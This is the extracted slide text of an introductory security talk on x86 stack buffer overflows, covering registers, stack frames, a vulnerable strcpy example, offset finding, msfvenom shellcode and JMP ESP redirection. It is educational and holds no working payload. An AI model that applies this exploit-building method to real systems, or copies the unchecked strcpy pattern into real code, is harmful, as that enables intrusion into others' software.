1. 1. BUFFER OVERFLOWS 101 SOME ASSEMBLY REQUIRED KORY KYZAR
2. 2. This talk is Very high levelRestricted to stack buer overowsRestricted to x86 architecture
3. 3. Whats a buffer? A buer can be thought of as an allocated space in memory intended to hold a certain amount of data. char A[10]; Allocate 10 bytes for the variable A
4. 4. Ok, and overow? Storing more data in the buer than it is designed to hold. t o o m u c h d a t a strcopy(A, toomuchdata); A Data is written to memory outside the region allocated to A. Weve overowed the buer.
5. 5. So What Happens?
6. 6. Crash
7. 7. Score
8. 8. So how do we score?
9. 9. So how do we score? Slow down there Romeo.
10. 10. So how do we score? Slow down there Romeo.
11. 11. CPU REGISTERS
12. 12. General Purpose Registers Small storage areas on the CPU that allow for very fast access.x86 CPUs have 8 general purpose registers.Basically, data from memory is loaded into a register, some form of processing is done, then the data is saved back to memory.Main ones we are concerned with are EBP and ESP.EIP is not considered a general purpose register, but we are interested in it as well.
13. 13. EBP - The Base Pointer Used to track the base of the current frame (function).Can be used for other purposes
14. 14. ESP - The Stack Pointer Used to track the top of the stack.As data is moved onto (PUSH) or o of (POP), the ESP register is incremented or decremented accordingly
15. 15. EIP - Instruction Pointer Always points to the memory address of the next instruction to be executed by the CPU
16. 16. EIP - Instruction Pointer Always points to the memory address of the next instruction to be executed by the CPU
17. 17. THE STACK
18. 18. What is the stack? Data structure that store values contiguously in memoryLast In First Out structureESP register marks the top of the stack
19. 19. Assume the below program #include void foo (char *bar){char A[10];strcpy(A, bar); // no bounds checking}int main (int argc, char **argv){foo(argv[1]);} Program simply takes an argument on the command line and copies it into a variable that is allocated 10 bytes (A) https://en.wikipedia.org/wiki/Stack_buffer_overow
20. 20. Stack - Program Initializes main High Mem Address Low Mem Address EBP ESP
21. 21. Stack - Foo Function Called ret address main High Mem Address Low Mem Address EBP ESP
22. 22. Stack - Foo Function Called ret address main High Mem Address Low Mem Address EBP ESP
23. 23. Stack - Foo Function Called saved EBP ret address main High Mem Address Low Mem Address EBP ESP
24. 24. Stack - Foo Function Called saved EBP ret address main High Mem Address Low Mem Address EBPESP
25. 25. Stack - Foo Function Called 10 bytes reserved for A saved EBP ret address main High Mem Address Low Mem Address EBP ESP
26. 26. Stack - strcopy()Assume we executed our program with an argument of AAAAAAAAAA AAAA AAAA AA saved EBP ret address main High Mem Address Low Mem Address EBP ESP
27. 27. Stack - strcopy()Now lets put our attacker hat on and execute our program with the argument AAAAAAAAAAAAAAAAAA AAAA AAAA AA AAAA AAAA main High Mem Address Low Mem Address EBP ESP
28. 28. Stack - strcopy()Now lets put our attacker hat on and execute our program with the argument AAAAAAAAAAAAAAAAAA AAAA AAAA AA AAAA AAAA main High Mem Address Low Mem Address EBP ESP
29. 29. Stack - strcopy()Now lets put our attacker hat on and execute our program with the argument AAAAAAAAAAAAAAAAAA AAAA AAAA AA AAAA AAAA main High Mem Address Low Mem Address EBP ESP
30. 30. Stack - strcopy()Now lets put our attacker hat on and execute our program with the argument AAAAAAAAAAAAAAAAAA AAAA AAAA AA AAAA AAAA main High Mem Address Low Mem Address EBP ESP We just overwrote the RET address, meaning we can tell the CPU which instruction to execute next.
31. 31. CONGRATULATIONS! YOU CRASHED.
32. 32. Buffer Overow Shopping List We need..The oset in the buer at which EIP is overwritten.Code to perform the exploit.A way to direct EIP to the code we want to run.
33. 33. The buer you were trying to overow was larger than 10 bytes? Lets say we have a large buer of an unknown size.We could write a fuzzer that submits an increasing number of As and make note of the length that causes the crash.But how do we know which of the As overwrote EIP? What if?
34. 34. Finding the offset pattern_create.rb is a ruby script that creates a non repeating sequence of characters of a given length.
35. 35. Finding the offset Using the string generated by pattern_create.rb as your input, you would analyze where the program crashed in a debugger. (i.e. Access violation when executing 30614239)Then you would check where that series of characters was in string with pattern_oset.rb Now you have the exact position in the buer to place your return address
36. 36. Shellcode Assembly code generated to execute the payload of the attackers choiceShellcode must be carefully crafted by handRIGHT?
37. 37. Shellcode Assembly code generated to execute the payload of the attackers choiceShellcode must be carefully crafted by handRIGHT?
38. 38. MSFVENOM MSFPAYLOAD AND MSFENCODE HAVE BEEN DEPRECATED IN FAVOR OF MSFVENOM
39. 39. So where do we point EIP? We need to get the CPU to execute our shellcodeSo just set EIP to the address at the beginning of your shellcode!?
40. 40. So where do we point EIP? We need to get the CPU to execute our shellcodeSo just set EIP to the address at the beginning of your shellcode!?
41. 41. Setting the RET address You cant hardcode the EIP address in since the program will be loaded into dierent places in memory at each execution.JMP ESP - one of the most common methods of getting back to your shellcode is to point EIP to a JMP ESP command. This can be used since its relative.This causes EIP to go to the address in the ESP register, which you should be able to use to access your shellcode.
42. 42. Putting it all together Padding NOP Sled Shellcode EIP = JMP ESP Padding Our Crafted Buffer Overow
43. 43. DEMO? THIS WILL PROBABLY END IN FLAMES
44. 44. @0XKTWO K2@KORROSIVESECURITY.COM